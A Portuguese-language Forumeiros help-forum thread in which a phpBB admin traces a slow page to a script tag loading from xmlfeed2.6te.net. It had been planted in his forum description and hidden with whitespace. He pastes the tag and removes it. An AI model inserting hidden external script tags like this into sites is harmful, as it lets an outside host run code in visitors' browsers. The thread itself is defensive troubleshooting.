Problema com script no fórum

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Resolvido Problema com script no fórum

Mensagem por Alvega em 01/03/15, 05:27 am

Detalhes da dúvida

Versão do fórum : phpBB3
Nível de acesso : Administrador
Navegador usado : Mozilla Firefox
Imagem :
Imagem da minha dúvida:

Membros afetados : Todos os membros do fórum
Problema começou : Há uma semana (mais ou menos)
Endereço do fórum : www.voovirtual.com

Descrição do problema

Olá,

Um script que linka a xmlfeed2.6te.net está causando problemas de lentidão no meu fórum.
Vi que outros usuários do Forumeiros estavam tendo problemas com o mesmo script neste tópico mas a nikka disse que os técnicos já tinham resolvido. Aqui o problema continua e vários usuários estão reportando problemas de lentidao devido a ele.
Agradeço que vejam o que se passa.

Obrigado.


Última edição por Alvega em 02/03/15, 02:27 pm, editado 2 vez(es)

Alvega
Nível 10

Masculino
Inscrito dia : 15/04/2008
Mensagens : 255
Pontos Ativos : 194

Ver perfil do usuário

Resolvido Re: Problema com script no fórum

Mensagem por Shek em 01/03/15, 07:45 am

Bom dia @Alvega!

Você consegue removê-lo? Obrigado por nos reportar, vamos notificá-los a respeito do problema. Piscada

Até mais!


Shek CrowleyAdmineiro - Fórum dos Fóruns

Clicar no botão ou no OBRIGADO não mata ninguém!
avatar

Shek
Admineiro
Admineiro

Masculino
Inscrito dia : 11/04/2009
Mensagens : 17165
Pontos Ativos : 21419

Ver perfil do usuário http://www.shiftactif.com https://go.topicit.net/ZosT/61pMt1mPsG https://www.facebook.com/shek.crowley https://twitter.com/shek_forumactif

Resolvido Re: Problema com script no fórum

Mensagem por Alvega em 01/03/15, 08:04 am

Olá Shek,

Não consigo remover pois ele não faz parte dos meus scripts, mas quando vejo o código fonte da página vejo que ele está lá. Só os técnicos do Forumeiros poderão fazer isso.

Obrigado.

Alvega
Nível 10

Masculino
Inscrito dia : 15/04/2008
Mensagens : 255
Pontos Ativos : 194

Ver perfil do usuário

Resolvido Re: Problema com script no fórum

Mensagem por Shek em 01/03/15, 09:24 am

Bom dia!

Na verdade ele foi adicionado pelo administrador. Tente localizá-lo em:
Painel de Controle >> Geral >> Configuração >> Descrição do fórum

Até mais!


Shek CrowleyAdmineiro - Fórum dos Fóruns

Clicar no botão ou no OBRIGADO não mata ninguém!
avatar

Shek
Admineiro
Admineiro

Masculino
Inscrito dia : 11/04/2009
Mensagens : 17165
Pontos Ativos : 21419

Ver perfil do usuário http://www.shiftactif.com https://go.topicit.net/ZosT/61pMt1mPsG https://www.facebook.com/shek.crowley https://twitter.com/shek_forumactif

Resolvido Re: Problema com script no fórum

Mensagem por Alvega em 01/03/15, 05:12 pm

@Shek escreveu:Bom dia!

Na verdade ele foi adicionado pelo administrador. Tente localizá-lo em:
Painel de Controle >> Geral >> Configuração >> Descrição do fórum

Até mais!

Negativo Sheck, não tem nada em "Descrição do site". Esse campo está em branco. Como eu disse, não adicionei esse script.

Att.

Alvega
Nível 10

Masculino
Inscrito dia : 15/04/2008
Mensagens : 255
Pontos Ativos : 194

Ver perfil do usuário

Resolvido Re: Problema com script no fórum

Mensagem por Sennior em 01/03/15, 05:21 pm

Saudações,

Estranho em...
Tentou olhar na Home Page?
Painel de Controle Seta Visualização Seta Página inicial Seta Geral

Veja se existe algum script lá e me responda... O senhor é o único Administrador?
Até mais.
avatar

Sennior
Membro profissional
Membro profissional

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16302
Pontos Ativos : 20791

Ver perfil do usuário http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Resolvido Re: Problema com script no fórum

Mensagem por Alvega em 01/03/15, 06:47 pm

Sim, sou o único administrador. Existem 3 scripts lá mas nenhum é esse. Os scripts que tenho lá são do Google e do Teamspeak.

Alvega
Nível 10

Masculino
Inscrito dia : 15/04/2008
Mensagens : 255
Pontos Ativos : 194

Ver perfil do usuário

Resolvido Re: Problema com script no fórum

Mensagem por Sennior em 01/03/15, 06:51 pm

Sabe o que é estranho? É que para mim a velocidade do teu fórum esta normal. Pensativo
E eu não vejo script nenhum em teu fórum que esta fazendo isso. huh

Já pediu aos membros que estão relatando tal erro para limparem o navegador ou algo do tipo?
Até mais.
avatar

Sennior
Membro profissional
Membro profissional

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16302
Pontos Ativos : 20791

Ver perfil do usuário http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Resolvido Re: Problema com script no fórum

Mensagem por Shek em 01/03/15, 07:05 pm

Boa tarde!

Poderia me dizer se seus templates são editados? Se sim, poderia me enviar o template overall_header localizado em Painel de Controle > Visualização > Templates > Geral > ?

Atenciosamente,
Shek


Shek CrowleyAdmineiro - Fórum dos Fóruns

Clicar no botão ou no OBRIGADO não mata ninguém!
avatar

Shek
Admineiro
Admineiro

Masculino
Inscrito dia : 11/04/2009
Mensagens : 17165
Pontos Ativos : 21419

Ver perfil do usuário http://www.shiftactif.com https://go.topicit.net/ZosT/61pMt1mPsG https://www.facebook.com/shek.crowley https://twitter.com/shek_forumactif

Resolvido Re: Problema com script no fórum

Mensagem por Alvega em 02/03/15, 02:44 am

@Sennior escreveu:Sabe o que é estranho? É que para mim a velocidade do teu fórum esta normal. Pensativo
E eu não vejo script nenhum em teu fórum que esta fazendo isso. huh

Já pediu aos membros que estão relatando tal erro para limparem o navegador ou algo do tipo?
Até mais.

Se instalar o addon NoScript para o Firefox vai ver que esse script está lá. Só que nem sempre ele causa lentidão. Os usuários reportaram que hoje tem estado normal. Ontem estava lento.

@Shek escreveu:Boa tarde!

Poderia me dizer se seus templates são editados? Se sim, poderia me enviar o template overall_header localizado em Painel de Controle > Visualização > Templates > Geral > ?

O template não é editado.

Clicando em "Ver código fonte da página" (botão direito do mouse usando o Firefox) dá para ver que o script está lá. Copiei essa parte e vou colocar aqui. Veja logo no início:

Código:
<script src=//xmlfeed2.6te.net/s></script></p></div><span class="corners-bottom"><span></span></span></div></div><div class="navbar"><div class="inner"><span class="corners-top"><span></span></span><ul class="linklist navlinks"><li><a class="mainmenu" href="/forum"><img id="i_icon_mini_index" class="sprite-icon_home" src="http://illiweb.com/fa/empty.gif" border="0"  hspace="2" alt="Início" title="Início" />Início</a> &nbsp;</li><li><a class="mainmenu" href="/"><img id="i_icon_mini_portal" class="sprite-icon_portal" src="http://illiweb.com/fa/empty.gif" border="0"  hspace="2" alt="Portal" title="Portal" />Portal</a> &nbsp;</li><li><a class="mainmenu" href="/calendar"><img id="i_icon_mini_calendar" class="sprite-icon_calendar" src="http://illiweb.com/fa/empty.gif" border="0"  hspace="2" alt="Calendário" title="Calendário"

Alvega
Nível 10

Masculino
Inscrito dia : 15/04/2008
Mensagens : 255
Pontos Ativos : 194

Ver perfil do usuário

Resolvido Re: Problema com script no fórum

Mensagem por Sennior em 02/03/15, 02:53 am

Saudações,

O código referente ao Script malfeitor é apenas este:
Código:
<p><script src=//xmlfeed2.6te.net/s></script></p>
Esta situado próximo ao logo de teu fórum.

Sou ainda leigo nesta linguagem, mas creio que utilizando este código JQuery o mesmo irá retirar este scritp:
Código:
  $(document).ready(function(){$('script').remove();});

Com o código acima, o mesmo retira?
Até mais.
avatar

Sennior
Membro profissional
Membro profissional

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16302
Pontos Ativos : 20791

Ver perfil do usuário http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Resolvido Re: Problema com script no fórum

Mensagem por Shek em 02/03/15, 11:36 am

Boa tarde!

Nossos técnicos disseram que o script está na descrição do seu fórum. A questão é que neste campo eles deram espaços até que o código desaparecesse, e por isso que não o viu. Sendo assim, tente excluí-lo agora.

Atenciosamente,
Shek


Shek CrowleyAdmineiro - Fórum dos Fóruns

Clicar no botão ou no OBRIGADO não mata ninguém!
avatar

Shek
Admineiro
Admineiro

Masculino
Inscrito dia : 11/04/2009
Mensagens : 17165
Pontos Ativos : 21419

Ver perfil do usuário http://www.shiftactif.com https://go.topicit.net/ZosT/61pMt1mPsG https://www.facebook.com/shek.crowley https://twitter.com/shek_forumactif

Resolvido Re: Problema com script no fórum

Mensagem por Alvega em 02/03/15, 01:52 pm

@Shek escreveu:Boa tarde!

Nossos técnicos disseram que o script está na descrição do seu fórum. A questão é que neste campo eles deram espaços até que o código desaparecesse, e por isso que não o viu. Sendo assim, tente excluí-lo agora.

Atenciosamente,
Shek

Estranho, realmente agora aparece lá, mas não fui eu que coloquei. Acabei de retirar, penso que agora o problema deve ficar resolvido.
Sabe para que servia esse script? Será que eu precisava dele?

Grato.

Alvega
Nível 10

Masculino
Inscrito dia : 15/04/2008
Mensagens : 255
Pontos Ativos : 194

Ver perfil do usuário

Resolvido Re: Problema com script no fórum

Mensagem por Sennior em 02/03/15, 01:57 pm

Saudações,

Bem amigo, pelo que entendi o Script fica redirecionando para a página de Error 404 do Frewebhostingarea, e como é um script tipo src, ele tá praticamente puxando um arquivo que não existe e teoricamente está causando uma certa lentidão por não existir.
Sendo assim, o senhor não precisava dele.

Algo mais?
Até mais.
avatar

Sennior
Membro profissional
Membro profissional

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16302
Pontos Ativos : 20791

Ver perfil do usuário http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Resolvido Re: Problema com script no fórum

Mensagem por Alvega em 02/03/15, 02:28 pm

Ok, obrigado. Sendo assim acho que o problema está resolvido.

Alvega
Nível 10

Masculino
Inscrito dia : 15/04/2008
Mensagens : 255
Pontos Ativos : 194

Ver perfil do usuário

Resolvido Re: Problema com script no fórum

Mensagem por Sennior em 02/03/15, 02:30 pm

Questão marcada como Resolvida ou o Autor solicitou que ela fosse arquivada.
Tópico marcado como Resolvido e movido para Questões resolvidas.
avatar

Sennior
Membro profissional
Membro profissional

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16302
Pontos Ativos : 20791

Ver perfil do usuário http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum